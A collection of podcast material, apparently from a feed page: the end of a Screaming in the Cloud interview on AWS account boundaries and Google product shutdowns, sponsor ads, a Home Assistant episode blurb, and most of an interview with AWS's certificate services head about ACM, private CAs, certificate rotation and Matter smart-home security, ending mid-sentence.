That's certainly the hope. I mean, we've talked about how we both can't predict the future, but I would like to hope that the future gets better. I really like GCP's project model. There's complaints I have with how Google Cloud works, and it's going to be here next year, and if the permission model is exactly how I'd like to use it, but I do like the mental organization that feels like Google was able to come in and solve a lot of those problems with running projects and having a lot of these different things. And part of that is, there's still services in AWS that don't really respect resource-based permissions or tag-based permissions, or I think the new one is attribute-based access control.Corey: One of the challenges I see, too, is that I don't think that there's been a lot of thought put into how a lot of these things are going to work between different AWS accounts. One of my bits of guidance whenever I'm talking to someone who's building anything, be it at AWS or external is, imagine an architecture diagram and now imagine that between any two resources in that diagram is now an account boundary. Because someone somewhere is going to have one there, so it sounds ridiculous, but you can imagine a microservices scenario where every component is in its own isolated account. What are you going to do now as a result? Because if you're going to build something that scales, you've got to respect those boundaries. And usually, that just means the person starts drinking.Brandon: Not a bad place to start, the organizational structure—lowercase organizations, not the Amazon service, Organizations—it's still a little tricky to get it in a way that sort of… I guess, I always kind of feel that these things are going to change and that the—right, the only constant is change. That's true. The services we use are going to change. The way that we're going to want to organize them is going to change. Our researcher is going to come out with something and say, “Hey, I found a really cool way to do something really terrible to the stuff in your cloud environment.”And that's going to happen eventually, in the fullness of time. So, how do we be able to react quickly to those kinds of changes? And how can we make sure that if you know, suddenly, we do need to separate out these services to go, you know, to decompose the monolith even more, or whatever the cool, current catchphrase is, and we have those account boundaries, which are phenomenal boundaries, they make it so much easier to do—if you can do multi-account then you've solved multi-regional on the way, you've sold failover, you've solve security issues. You have not solved the fact that your life is considerably more challenging at the moment, but I would really hope that in you know, even next year, but by the time five years comes around, that that's really been taken to heart within Amazon and it's a lot easier to be working creating services in different accounts that can talk to each other, especially in the current environment where it's kind of a mess to wire these things all together. ClickOps has its place, but some console applications just don't want to believe that you have a KMS key in another account because well, why would you put that over there? It's not like if your current account has a problem, you want to lose all your data that's encrypted.Corey: It's one of those weird things, too, where the clouds almost seem to be arguing against each other. Like, I would be hard-pressed to advise someone not to put a ‘rehydrate the entire business' level of backups into a different cloud provider entirely, but there's so steeped in the orthodoxy of no other clouds ever, that that message is not something that they can effectively communicate. And I think they're doing their customers a giant disservice by that, just because it is so much easier to explain to your auditor that you've done it than to explain why it's not necessary. And it's never true; you always have the single point of failure of the payment instrument, or the contract with that provider that could put things at risk.Is it a likely issue? No. But if you're running a publicly traded company on top of it, you'd be negligent not to think about it that way. So, why pretend otherwise?Brandon: Is that a question for me because [laugh]—Corey: Oh, that was—no, absolutely. That was a rant ending in a rhetorical question. So, don't feel you have to answer it. But getting the statement out there because hopefully, someone at Amazon is listening to this.Brandon: That's, uh, hopefully, if you find out who's the one that listens to this and can affect it, then yeah, I'd like to send them a couple of emails because absolutely. There's room out there, there will always be room for at least two providers.Corey: Yeah, I'd say a third, but I don't know that Google is going to have the attention span to still have a cloud offering by lunchtime today.Brandon: Yeah. I really wish that I had more faith in the services and that they weren't going—you know, speaking of services changing underneath you, that's definitely a—speaking of services changing underneath, you definitely a major disservice if you don't know—if you're going to put into work into architecting and really using cloud providers as they're meant to be used. Not in a, sort of, least common denominator sense, in which case, you're not in good shape.Corey: Right. You should not be building something with an idea toward what if this gets deprecated. You shouldn't have to think about that on a consistent basis.Brandon: Mm-hm. Absolutely. You should expect those things to change because they will, right, the performance impact. I mean, the performance of these services is going to change, the underlying technology that the providers use is going to change, but you should still be able to mostly expect that at least the API calls you make are going to still be there and still be consistent come this time next year.Corey: The thing that really broke me was the recent selling off of Google domains to Squarespace. Nothing against Squarespace, but they have a different target market in many respects. And oh, I'm a Google customer, you're now going to give all of my information to a third party I never asked to deal with. Great. And more to the point, if I recommend Google to folks because as has happened in years past, then they canceled the thing that I recommended, then I looked like a buffoon. So, we've gotten to a point now where it has become so steady and so consistent, that I fear I cannot, in good conscience, recommend a Google product without massive caveats. Otherwise, I look like a clown or worse, a paid shill.Brandon: Yeah. And when you want to start incorporating these things into the core of your business, to take that point about, you know, total failover scenarios, you should, you know, from you want it to have a domain registered in a Google service that was provisioned to Google Cloud services, that whole sort of ecosystem involved there, that's now gone, right? If I want to use Google Cloud with a Google Cloud native domain name hosting services, I can't. How am—I just—now I can't [laugh]. There's, like, not workarounds available.I've got to go to some other third-party and it just feels odd that an organization would sort of take those core building blocks and outsource them. [I know 00:29:05] that Google's core offering isn't Google Cloud; it's not their primary focus, and it kind of reflects that, which was a shame. There's things that I'd love to see grow out of Google Cloud and get better. And, you know, competition is good for the whole cloud computing industry.Corey: I think that it's a sad thing, but it's real, that there are people who were passionate defenders of Google over the years. I used to be one. We saw a bunch of them with Stadia fans coming out of the woodwork, and then all those people who have defended Google and said, “No, no, you can trust Google on this service because it's different,” for some reason or other, then wind up looking ridiculous. And some of the staunchest Google defenders that I've seen are starting to come around to my point of view. Eventually, you've run out of people who are willing to get burned if you burn them all.Brandon: Yeah. I've always been a little, uh… maybe this is the security Privacy part of me; I've always been a little leery of the services that really want to capture and gather your data. But I always respected the Google engineering that went into building these things at massive scale. It's something beyond my ability to understand as I haven't worked in something that big before. And Google made it look… maybe not effortless, but they made it look like they knew what they were doing, they could build something really solid.And I don't know if that's still true because it feels like they might know how to build something, and then they'll just dismantle it and turn it over to somebody else, or just dismantle it completely. And I think humans, we do a lot of things because we don't want to look foolish and… now recommending Google Cloud starts to make you wonder, “Am I going to look foolish?” Is this going to be a reflection on me in a year or two years, when you got to come in to say, “Hey, I guess that whole thing we architected around, it's being sold to someone else. It's being closed down. We got to transfer and rearchitect our whole whatever we built because of factors out of our control.” I want to be rearchitecting things because I screwed it up. I want to be rearchitecting things because I made an interesting novel mistake, not something that's kind of mundane, like, oh, I guess the thing we were going to use got shut down. Like, that makes it look like not only can I not predict the future, but I can't even pretend to read the tea leaves.Corey: And that's what's hard is because, on some level, our job, when we work in operations and cloud and try and make these decisions, is to convince the business we know what we're talking about. And when we look foolish, we don't make that same mistake again.Brandon: Mm-hm. Billing and security are oftentimes frequently aligned with each other. We're trying to convince the business that we need to build things a certain way to get a certain outcome, right? Either lower costs or more performance for the dollar, so that way, we don't wind up in the front page of newspapers, any kinds of [laugh] any kind of those things.Corey: Oh, yes. I really want to thank you for taking the time to speak with me. If people want to learn more, where's the best place for them to find you?Brandon: The best place to find me, I have a website about me, [brandonsherman.com 00:32:13]. That's where I post stuff. There's some links to—I have a [Mastodon 00:32:18] profile. I'm not much of a social, sort of post your information out there kind of person, but if you want to get a hold of me, then that's probably the best way to find me and contact me. Either that or head out to the desert somewhere, look for a silver truck out in the dunes and without technology around. It's another good spot if you can find me there.Corey: And I will include a link to that, of course, in the [show notes 00:32:45]. Thank you so much for taking the time to speak with me today. As always, I appreciate it.Brandon: Thank you very much for having me, Corey. Good to chat with you.Corey: Brandon Sherman, cloud security engineer at Temporal. I'm Cloud Economist Corey Quinn and this is Screaming in the Cloud. If you've enjoyed this podcast, please leave a five-star review on your podcast platform of choice, whereas if you've hated this podcast, please leave a five-star review on your podcast platform of choice along with an angry comment that will somehow devolve into you inviting me to your new uninspiring cloud security conference that your vendor is putting on, and is of course named after an email subject line.Corey: If your AWS bill keeps rising and your blood pressure is doing the same, then you need The Duckbill Group. We help companies fix their AWS bill by making it smaller and less horrifying. The Duckbill Group works for you, not AWS. We tailor recommendations to your business and we get to the point. Visit duckbillgroup.com to get started.

This episode is brought to you by BetterHelp. Go to betterhelp.com/dns today to get 10% off your first month. Be sure to use promo code DNS at sign up.

With 2023 the year of the voice, Rohan and Phil talk with Mike Hansen about what's being worked on, and what the future may hold For complete show notes and more information about the topics discussed in this episode, be sure to check the notes at https://hasspodcast.io/sp009/ Watch this episode on YouTube Support Rohan and Phil on Patreon This episode was made possible thanks to our sponsor Home Assistant Cloud by Nabu Casa Easily connect to Google and Amazon voice assistants for a small monthly fee that also supports the Home Assistant project. Configuration is via the User Interface so no fiddling with router settings, dynamic DNS or YAML. Special thanks to todays guest Michael Hansen Website: https://synesthesiam.com Twitter: @rhasspy ----- Hosts ----- Phil Hawthorne Website Smart Home Products Twitter: @philhawthorne Buy Phil a Coffee Rohan Karamandi Website Smart Home Products Twitter: @rohank9 Buy Rohan a Coffee

Jonathan (Koz) Kozolchyk, General Manager for Certificate Services at AWS, joins Corey on Screaming in the Cloud to discuss the best practices he recommends around certificates. Jonathan walks through when and why he recommends private certs, and the use cases where he'd recommend longer or unusual expirations. Jonathan also highlights the importance of knowing who's using what cert and why he believes in separating expiration from rotation. Corey and Jonathan also discuss their love of smart home devices as well as their security concerns around them and how they hope these concerns are addressed moving forward. About JonathanJonathan is General Manager of Certificate Services for AWS, leading the engineering, operations, and product management of AWS certificate offerings including AWS Certificate Manager (ACM) AWS Private CA, Code Signing, and Encryption in transit. Jonathan is an experienced leader of software organizations, with a focus on high availability distributed systems and PKI. Starting as an intern, he has built his career at Amazon, and has led development teams within our Consumer and AWS businesses, spanning from Fulfillment Center Software, Identity Services, Customer Protection Systems and Cryptography. Jonathan is passionate about building high performing teams, and working together to create solutions for our customers. He holds a BS in Computer Science from University of Illinois, and multiple patents for his work inventing for customers. When not at work you'll find him with his wife and two kids or playing with hobbies that are hard to do well with limited upside, like roasting coffee.Links Referenced: AWS website: https://www.aws.com Email: mailto:koz@amazon.com Twitter: https://twitter.com/seakoz TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: In the cloud, ideas turn into innovation at virtually limitless speed and scale. To secure innovation in the cloud, you need Runtime Insights to prioritize critical risks and stay ahead of unknown threats. What's Runtime Insights, you ask? Visit sysdig.com/screaming to learn more. That's S-Y-S-D-I-G.com/screaming.My thanks as well to Sysdig for sponsoring this ridiculous podcast.Corey: Welcome to Screaming in the Cloud. I'm Corey Quinn. As I record this, we are about a week and a half from re:Inforce in Anaheim, California. I am not attending, not out of any moral reason not to because I don't believe in cloud security or conferences that Amazon has that are named after subject lines, but rather because I am going to be officiating a wedding on the other side of the world because I am an ordained minister of the Church of There Is A Problem With This Website's Security Certificate. So today, my guest is going to be someone who's a contributor, in many ways, to that religion, Jonathan Kozolchyk—but, you know, we all call him Koz—is the general manager for Certificate Services at AWS. Koz, thank you for joining me.Koz: Happy to be here, Corey.Corey: So, one of the nice things about ACM historically—the managed service that handles certificates from AWS—is that for anything public-facing, it's free—which is always nice, you should not be doing upcharges for security—but you also don't let people have the private portion of the cert. You control all of the endpoints that terminate SSL. Whereas when I terminate SSL myself, it terminates on the floor because I've dropped things here and there, which means that suddenly the world of people exposing things they shouldn't or expiry concerns just largely seemed to melt away. What was the reason that Amazon looked around at the landscape and said, “Ah, we're going to launch our own certificate service, but bear with me here, we're not going to charge people money for it.” It seems a little bit out of character.Koz: Well, Amazon itself has been battling with certificates for years, long before even AWS was a thing, and we learned that you have to automate. And even that's not enough; you have to inspect and you have to audit, you need a controlled loop. And we learned that you need a closed loop to truly manage it and make sure that you don't have outages. And so, when we built ACM, we built it saying, we need to provide that same functionality to our customers, that certificates should not be the thing that makes them go out. Is that we need to keep them available and we need to minimize the sharp edges customers have to deal with.Corey: I somewhat recently caught some flack on one of the Twitter replacement social media sites for complaining about the user experience of expired SSL certs. Because on the one hand, if I go to my bank's website, and the response is that instead, the server is sneakyhackerman.com, it has the exact same alert and failure mode as, holy crap, this certificate reached its expiry period 20 minutes ago. And from my perspective, one of those is a lot more serious than the other. What also I wind up encountering is not just when I'm doing banking, but when I'm trying to read some random blog on how to solve a technical problem. I'm not exactly putting personal information into the thing. It feels like that was a missed opportunity, agree or disagree?Koz: Well, I wouldn't categorize it as a missed opportunity. I think one of the things you have to think about with security is you have to keep it simple so that everyone, whether they're a technologist or not, can abide by the rules and be safe. And so, it's much easier to say to somebody, “There's something wrong. Period. Stop.” versus saying there are degrees of wrongness. Now, that said, boy, do I wish we had originally built PKI and TLS such that you could submit multiple certificates to somebody, in a connection for example, so that you could always say, you know, my certificates can expire, but I've got two, and they're off by six months, for example. Or do something so that you don't have to close failed because the certificate expired.Corey: It feels like people don't tend to think about what failure modes are going to look like. Because, pfhh, as an expired certificate? What kind of irresponsible buffoon would do such a thing? But I've worked in enough companies where you have historically, the wildcard cert because individual certs cost money, once upon a time. So, you wound up getting the one certificate that could work on all of the stuff that ends in the same domain.And that was great, but then whenever it expired, you had to go through and find all the places that you put it and you always miss some, so things would break for a while and the corporate response was, “Ugh, that was awful. Instead of a one-year certificate, let's get a five-year or a ten-year certificate this time.” And that doesn't make the problem better; it makes it absolutely worse because now it proliferates forever. Everyone who knows where that thing lives is now long gone by the time it hits again. Counterintuitively, it seems the industry has largely been moving toward short-lived certs. Let's Encrypt, for example, winds up rotating every 90 days, by my estimation. ACM is a year, if memory serves.Koz: So, ACM certs are 13 months, and we start rotating them around the 11th month. And Let's Encrypt offers you 90-day certs, but they don't necessarily require you to rotate every 90 days; they expire in 90 days. My tip for everybody is divorce expiration from rotation. So, if your cert is a 90-day cert, rotate it at 45 days. If your cert is a year cert, give yourself a couple of months before expiration to start the rotation. And then you can alarm on it on your own timeline when something fails, and you still have time to fix it.Corey: This makes a lot of sense in—you know, the second time because then you start remembering, okay, everywhere I use this cert, I need to start having alarms and alerts. And people are bad at these things. What ACM has done super well is that it removes that entire human from the loop because you control all of the endpoints. You folks have the ability to rotate it however often you'd like. You could have picked arbitrary timelines of huge amounts of time or small amounts of time and it would have been just fine.I mean, you log into an EC2 instance role and I believe the credentials get passed out of either a 6 or a 12-hour validity window, and they're consistently rotating on the back end and it's completely invisible to the customer. Was there ever thought given to what that timeline should be,j what that experience should be? Or did you just, like, throw a dart at a wall? Like, “Yeah, 13 months feels about right. We're going to go with that.” And never revisited it. I have a guess which—Koz: [laugh].Corey: Side of that it was. Did you think at all about what you were doing at the time, or—yeah.Koz: So, I will admit, this happened just before I got there. I got to ACM after—Corey: Ah, blame the predecessor. Always a good call.Koz: —the launch. It's a God-given right to blame your predecessor.Corey: Oh, absolutely. It's their entire job.Koz: I think they did a smart job here. What they did was they took the longest lifetime cert that was then allowed, at 13 months, knowing that we were going to automate the rotation and basically giving us as much time as possible to do it, right, without having to worry about scaling issues or having to rotate overly frequently. You know, there are customers who while I don't—I strongly disagree with [pinning 00:07:35], for example, but there are customers out there who don't like certs to change very often. I don't recommend pinning at all, but I understand these cases are out there, and changing it once every year can be easier on customers than changing it every 20 minutes, for example. If I were to pick an ideal rotation time, it'd probably be under ten days because an OCSP response is good for ten days and if you rotate before, then I never have to update an OCSP response, for example. But changing that often would play havoc with many systems because of just the sheer frequency you're rotating what is otherwise a perfectly valid certificate.Corey: It is computationally expensive to generate certificates at scale, I would imagine.Koz: It starts to be a problem. You're definitely putting a lot of load on the HSMs at that point, [laugh] when you're generating. You know, when you have millions of certs out in deployment, you're generating quite a few at a time.Corey: There is an aspect of your service that used to be part of ACM and now it's its own service—which I think is probably the right move because it was confusing for a lot of customers—Amazon looks around and sees who can we compete with next, it feels like sometimes. And it seemed like you were squarely focused on competing against your most desperate of all enemies, my crappy USB key where I used to keep the private CA I used at any given job—at the time; I did not keep it after I left, to be very clear—for whatever I'm signing things for certificates for internal use. You're, like, “Ah, we can have your crappy USB key as a service.” And sure enough, you wound up rolling that out. It seems like adoption has been relatively brisk on that, just because I see it in almost every client account I work with.Koz: Yeah. So, you're talking about the private CA offering which is—Corey: I—that's right. Private CA was the new service name. Yes, it used to be a private certificate authority was an aspect of ACM, and now you're—mmm, we're just going to move that off.Koz: And we split it out because like you said customers got confused. They thought they had to only use it with ACM. They didn't understand it was a full standalone service. And it was built as a standalone service; it was not built as part of ACM. You know, before we built it, we talked to customers, and I remember meeting with people running fairly large startups, saying, “Yes, please run this for me. I don't know why, but I've got this piece of paper in my sock drawer that one of my security engineers gave me and said, ‘if something goes wrong with our CA, you and two other people have to give me this piece of paper.'” And others were like, “Oh, you have a piece of paper? I have a USB stick in my sock drawer.” And like, this is what, you know, the startup world was running their CAs from sock drawers as far as I can tell.Corey: Yeah. A piece of paper? Someone wrote out the key by hand? That sounds like hell on earth.Koz: [sigh]. It was a sharding technique where you needed, you know, three of five or something like that to—Corey: Oh, they, uh, Shamir's Secret Sharing Service.Koz: Yes.Corey: The SSSS. Yeah.Koz: Yes. You know, and we looked at it. And the other alternative was people would use open-source or free certificate authorities, but without any of the security, you'd want, like, HSM backing, for example, because that gets really expensive. And so yeah, we did what our customers wanted: we built this service. We've been very happy with the growth it's taken and, like you said, we love the places we've seen it. It's gone into all kinds of different things, from the traditional enterprise use cases to IoT use cases. At one point, there's a company that tracks sheep and every collar has one of our certs in it. And so, I am active in the sheep-tracking industry.Corey: I am certain that some wit is going to comment on this. “Oh, there's a company out there that tracks sheep. Yeah, it's called Apple,” or Facebook, or whatever crappy… whatever axe someone has to grind against any particular big company. But you're talking actual sheep as in baa, smell bad, count them when going to sleep?Koz: Yes. Actual sheep.Corey: Excellent, excellent.Koz: The certs are in drones, they're in smart homes, so they're everywhere now.Corey: That is something I want to ask you about because I found that as a competition going on between your service, ACM because you won't give me the private keys for reasons that we already talked about, and Let's Encrypt. It feels like you two are both competing to not take my money, which is, you know, an odd sort of competition. You're not actually competing, you're both working for a secure internet in different ways, but I wind up getting certificates made automatically for me for all of my internal stuff using Let's Encrypt, and with publicly resolvable domain names. Why would someone want a private CA instead of an option that, okay, yeah, we're only using it internally, but there is public validity to the certificate?Koz: Sure. And just because I have to nitpick, I wouldn't say we're competing with them. I personally love Let's Encrypt; I use them at home, too. Amazon supports them financially; we give them resources. I think they're great. I think—you know, as long as you're getting certs I'm happy. The world is encrypted and I—people use private CA because fundamentally, before you get to the encryption, you need secure identity. And a certificate provides identity. And so, Let's Encrypt is great if you have a publicly accessible DNS endpoint that you can prove you own and get a certificate for and you're willing to update it within their 90-day windows. Let's use the sheep example. The sheep don't have publicly valid DNS endpoints and so—Corey: Or to be very direct with you, they also tend to not have terrific operational practices around updating their own certificates.Koz: Right. Same with drones, same with internal corporate. You may not want your DNS exposed to the internet, your internal sites. And so, you use a private certificate where you own both sides of the connection, right, where you can say—because you can put the CA in the trust store and then that gets you out of having to be compliant with the CA browser form and the web trust rules. A lot of the CA browser form dictates what a public certificate can and can't do and the rules around that, and those are built very much around the idea of a browser connecting to a client and protecting that user.Corey: And most people are not banking on a sheep.Koz: Most people are not banking on a sheep, yes. But if you have, for example, a database that requires a restart to pick up a new cert, you're not going to want to redo that every 90 days. You're probably going to be fine with a five-year certificate on that because you want to minimize your downtime. Same goes with a lot of these IoT devices, right? You may want a thousand-year cert or a hundred-year cert or cert that doesn't expire because this is a cert that happens at—that is generated at creation for the device. And it's at birth, the machine is manufactured and it gets a certificate and you want it to live for the life of that device.Or you have super-secret-project.internal.mycompany.com and you don't want a publicly visible cert for that because you're not ready to launch it, and so you'll start with a private cert. Really, my advice to customers is, if you own both pieces of the connection, you know, if you have an API that gets called by a client you own, you're almost always better off with a private certificate and managing that trust store yourself because then you are subject not to other people's rules, but the rules that fit the security model and the threat assessment you've done.Corey: For the publication system for my newsletter, when I was building it out, I wanted to use client certificates as a way of authenticating that it was me. Because I only have a small number of devices that need to talk to this thing; other people don't, so how do I submit things into my queue and manage it? And back in those ancient days, the API Gateways didn't support TLS authentication. Now, they do. I would redo it a bunch of different ways. They did support API key as an authentication mechanism, but the documentation back then was so terrible, or I was so new to this stuff, I didn't realize what it was and introduced it myself from first principles where there's a hard-coded UUID, and as long as there's the right header with that UUID, I accept it, otherwise drop it on the floor. Which… there are probably better ways to do that.Koz: Sure. Certificates are, you know, a very popular way to handle that situation because they provide that secure identity, right? You can be assured that the thing connecting to you can prove it is who they say they are. And that's a great use of a private CA.Corey: Changing gears slightly. As we record this, we are about two weeks before re:Inforce, but I will be off doing my own thing on that day. Anything interesting and exciting coming out of your group that's going to be announced, with the proviso, of course, that this will not air until after re:Inforce.Koz: Yes. So, we are going to be pre-announcing the launch of a connector for Active Directory. So, you will be able to tie your private CA instance to your Active Directory tree and use private CA to issue certificates for use by Active Directory for all of your Windows hosts for the users in that Active Directory tree.Corey: It has been many years since I touched Windows in anger, but in 2003 or so, I was a mediocre Small Business Windows Server Admin. Doesn't Active Directory have a private CA built into it by default for whenever you're creating a new directory?Koz: It does.Corey: Is that one of the FSMO roles? I'm trying to remember offhand.Koz: What's a Fimal?Corey: FSMO. F-S-M-O. There are—I forget, it's some trivia question that people love to haze each other with in Microsoft interviews. “What are the seven FSMO roles?” At least back then. And have to be moved before you decommission a domain controller or you're going to have tears before bedtime.Koz: Ah. Yeah, so Microsoft provides a certificate authority for use with Active Directory. They've had it for years and they had to provide it because back then nobody had a certificate authority, but AD needed one. The difference here is we manage it for you. And it's backed by HSMs. We ensure that the keys are kept secure. It's a serverless connection to your Active Directory tree, you don't have to run any software of ours on your hosts. We take care of all of it.And it's been the top requests from customers for years now. It's been quite [laugh] a bit of effort to build it, but we think customers are going to love it because they're going to get all the security and best practices from private CA that they're used to and they can decommission their on-prem certificate authority and not have to go through the hassle of running it.Corey: A big area where I see a lot of private CA work has been in the realm of desktops for corporate environments because when you can pass out your custom trusted root or trusted CA to all of the various nodes you have and can control them, it becomes a lot easier. I always tended to shy away from it, just because in small businesses like the one that I own, I don't want to play corporate IT guy more than I absolutely have to.Koz: Yeah. Trust or management is always a painful part of PKI. As if there weren't enough painful things in PKI. Trust store management is yet another one. Thankfully, in the large enterprises, there are good tooling out there to help you manage it for the corporate desktops and things like that.And with private CA, you can also, if you already have an offline root that is in all of your trust stores in your enterprise, you can cross-sign the route that we give you from private CA into that hierarchy. And so, then you don't have to distribute a new trust store out if you don't want to.Corey: This is a tricky release and I'm very glad I'm taking the week off it's getting announced because there are two reactions that are going to happen to any snarking I can do about this. The first is no one knows what the hell this is and doesn't have any context for the rest, and the other folks are going to be, “Yes, shut up clown. This is going to change my workflow in amazing ways. I'll deal with your nonsense later. I want to do this.” And I feel like one of those constituencies is very much your target market and the other isn't. Which is fine. No service that AWS offers—except the bill—is for every customer, but every service is for someone.Koz: That's right. We've heard from a lot of our customers, especially as they—you know, the large international ones, right, they find themselves running separate Active Directory CAs in different countries because they have different regulatory requirements and separations that they want to do. They are chomping at the bit to get this functionality because we make it so easy to run a private CA in these different regions. There's certainly going to be that segment at re:Inforce, that's just happy certificates happen in the background and they don't think anything about where they come from and this won't resonate with them, but I assure you, for every one of them, they have a colleague somewhere else in the building that is going to do a happy dance when this launches because there's a great deal of customer heavy-lifting and just sharp edges that we're taking away from them. And we'll manage it for them, and they're going to love it.[midroll 0:21:08]Corey: One thing that I have seen the industry shift to that I love is the Let's Encrypt model, where the certificate expires after 90 days. And I love that window because it is a quarter, which means yes, you can do the crappy thing and have a calendar reminder to renew the thing. It's not something you have to do every week, so you will still do it, but you're also not going to love it. It's just enough friction to inspire people to automate these things. And that I think is the real win.There's a bunch of things like Certbot, I believe the protocol is called ACME A-C-M-E, always in caps, which usually means an acronym or someone has their caps lock key pressed—which is of course cruise control for cool. But that entire idea of being able to have a back-and-forth authentication pass and renew certificates on a schedule, it's transformative.Koz: I agree. ACM, even Amazon before ACM, we've always believed that automation is the way out of a lot of this pain. As you said earlier, moving from a one-year cert to a five-year cert doesn't buy you anything other than you lose even more institutional knowledge when your cert expires. You know, I think that the move to further automation is great. I think ACME is a great first step.One of the things we've learned is that we really do need a closed loop of monitoring to go with certificate issuance. So, at Amazon, for example, every cert that we issue, we also track and the endpoints emit metrics that tell us what cert they're using. And it's not what's on disk, it's what's actually in the endpoint and what they're serving from memory. And we know because we control every cert issued within the company, every cert that's in use, and if we see a cert in use that, for example, isn't the latest one we issued, we can send an alert to the team that's running it. Or if we've issued a cert and we don't see it in use, we see the old ones still in use, we can send them an alert, they can alarm and they can see that, oh, we need to do something because our automation failed in this case.And so, I think ACME is great. I think the push Let's Encrypt did to say, “We're going to give you a free certificate, but it's going to be short-lived so you have to automate,” that's a powerful carrot and stick combination they have going, and I think for many customers Certbot's enough. But you'll see even with ACM where we manage it for our customers, we have that closed loop internally as well to make sure that the cert when we issue a new cert to our client, you know, to the partner team, that it does get picked up and it does get loaded. Because issuing you a cert isn't enough; we have to make sure that you're actually using the new certificate.Corey: I also have learned as a result of this, for example, that AWS certificate manager—Amazon Certificate Manager, the ACM, the certificate thingy that you run, that so many names, so many acronyms. It's great—but it has a limit—by default—of 2500 certificates. And I know this because I smacked into it. Why? I wasn't sitting there clicking and adding that many certificates, but I had a delightful step function pattern called ‘The Lambda invokes itself.' And you can exhaust an awful lot of resources that way because I am bad at programming. That is why for safety, I always recommend that you iterate development-wise in an account that is not production, and preferably one that belongs to someone else.Koz: [laugh]. We do have limits on cert issuance.Corey: You have limits on everything in AWS. As it should because it turns out that whatever there's not a limit, A, free database just dropped, and B, things get hammered to death. You have to harden these things. And it's one of those things that's obvious once you've operated at a certain point of scale, but until you do, it just feels arbitrary and capricious. It's one of those things where I think Amazon is still—and all the cloud companies who do this—are misunderstood.Koz: Yeah. So, in the case of the ACM limits, we look at them fairly regularly. Right now, they're high enough that most of our customers, vast majority, never come close to hitting it. And the ones that do tend to go way over.Corey: And it's been a mistake, as in my case as well. This was not a complaint, incidentally. It was like, well, I want to wind up having more waste and more ridiculous nonsense. It was not my concern.Koz: No no no, but we do, for those customers who have not mistake use cases but actual use cases where they need more, we're happy to work with their account teams and with the customer and we can up those limits.Corey: I've always found that limit increases, with remarkably few exceptions, the process is, “Explain to you what your use case is here.” And I feel like that is a screen for, first, are you doing something horrifying for which there's a better solution? And two, it almost feels like it's a bit of a customer research approach where this is fine for most customers. What are you folks doing over there and is there a use case we haven't accounted for in how we use the service?Koz: I always find we learned something when we look at the [P100 00:26:05] accounts that they use the most certificates, and how they're operating.Corey: Every time I think I've seen it all on AWS, I just talk to one more customer, and it's back to school I go.Koz: Yep. And I thank them for that education.Corey: Oh, yeah. That is the best part of working with customers and honestly being privileged enough to work with some of these things and talk to the people who are building really neat stuff. I'm just kibitzing from the sideline most of the time.Koz: Yeah.Corey: So, one last topic I want to get into before we call it a show. You and I have been talking a fair bit, out of school, for lack of a better term, around a couple of shared interests. The one more germane to this is home automation, which is always great because especially in a married situation, at least as I am and I know you are as well, there's one partner who is really into home automation and the other partner finds himself living in a haunted house.Koz: [laugh]. I knew I had won that battle when my wife was on a work trip and she was in a hotel and she was talking to me on the phone and she realized she had to get out of bed to turn the lights off because she didn't have our Alexa Good Night routine available to her to turn all the lights off and let her go to bed. And so, she is my core customer when I do the home automation stuff. And definitely make sure my use cases and my automations work for her. But yeah, I'm… I love that space.Coincidentally, it overlaps with my work life quite a bit because identity in smart home is a challenge. We're really excited about the Matter standard. For those listening who aren't sure what that is, it's a new end-all be-all smart home standard for defining devices in a protocol-independent way that lets your hubs talk to devices without needing drivers from each company to interact with them. And one of the things I love about it is every device needs a certificate to identify it. And so, private CA has been a great partner with Matter, you know, it goes well with it.In fact, we're one of the leading certificate authorities for Matter devices. Customers love the pricing and the way they can get started without talking to anybody. So yeah, I'm excited to see, you know, as a smart home junkie and as a PKI guy, I'm excited to see Matter take off. Right now I have a huge amalgamation of smart home devices at home and seeing them all go to Matter will be wonderful.Corey: Oh, it's fantastic. I am a little worried about aspects of this, though, where you have things that get access to the internet and then act as a bridge. So suddenly, like, I have a IoT subnet with some controls on it for obvious reasons and honestly, one of the things I despise the most in this world has been the rise of smart TVs because I just want you to be a big dumb screen. “Well, how are you going to watch your movies?” “With the Apple TV I've plugged into the thing. I just want you to be a screen. That's it.” So, I live a bit in fear of the day where these things find alternate ways to talk to the internet and, you know, report on what I'm watching.Koz: Yeah, I think Matter is going to help a lot with this because it's focused on local control. And so, you'll have to trust your hub, whether that's your TV or your Echo device or what have you, but they all communicate securely amongst themselves. They use certificates for identification, and they're building into Matter a robust revocation mechanism. You know, in my case at home, my TV's not connected to the internet because I use my Fire TV to talk to it, similar to your Apple TV situation. I want a device I control not my TV, doing it. I'm happy with the big dumb screen.And I think, you know, what you're going to end up doing is saying there's a device out there you'll trust maybe more than others and say, “That's what I'm going to use as my hub for my Matter devices and that's what will speak to the internet,” and otherwise my Matter devices will talk directly to my hub.Corey: Yeah, there's very much a spectrum of trust. There's the, this is a Linux distribution on a computer that I installed myself and vetted and wound up contributing to at one point on the one end of the spectrum, and the other end of the spectrum of things you trust the absolute least in this world, which are, of course, printers. And most things fall somewhere in between.Koz: Yes, right, now, it is a Wild West of rebranded white-label applications, right? You have all kinds of companies spitting out reference designs as products and white labeling the control app for it. And so, your phone starts collecting these smart home applications to control each one of these things because you buy different switches from different people. I'm looking forward to Matter collapsing that all down to having one application and one control model for all of the smart home devices.Corey: Wemo explicitly stated that they're not going to be pursuing this because it doesn't let them differentiate the experience. Read as, cash grab. I also found out that Wemo—which is, of course, a Belkin subsidiary—had a critical vulnerability in some of the light switches it offered, including the one built into the wall in this room—until a week ago—where they're not going to be releasing a patch for it because those are end-of-life. Really? Because I log into the Wemo app and the only way I would have known this has been the fact that it's been a suspiciously long time since there was a firmware update available for it. But that's it. Like, the only way I found this out was via a security advisory, at which point that got ripped out of the wall and replaced with something that isn't, you know, horrifying. But man did that bother me.Koz: Yeah. I think this is still an open issue for the smart home world.Corey: Every company wants a moat of some sort, but I don't want 15 different apps to manage this stuff. You turned me on to Home Assistant, which is an open-source, home control automation system and, on some level, the interface is very clearly built by a bunch of open-source people—good for them; they could benefit from a graphic designer or three to—or user experience person to tie it all together, but once you wrap your head around it, it works really well, where I have automations let me do different things. They even have an Apple Watch app [without its 00:32:14] complications on it. So, I can tap the thing and turn on the lights in my office to different levels if I don't want to talk to the robot that runs my house. And because my daughter has started getting very deeply absorbed into some YouTube videos from time to time, after the third time I asked her what—I call her name, I tap a different one and the internet dies to her iPad specifically, and I wait about 30 to 45 seconds, and she'll find me 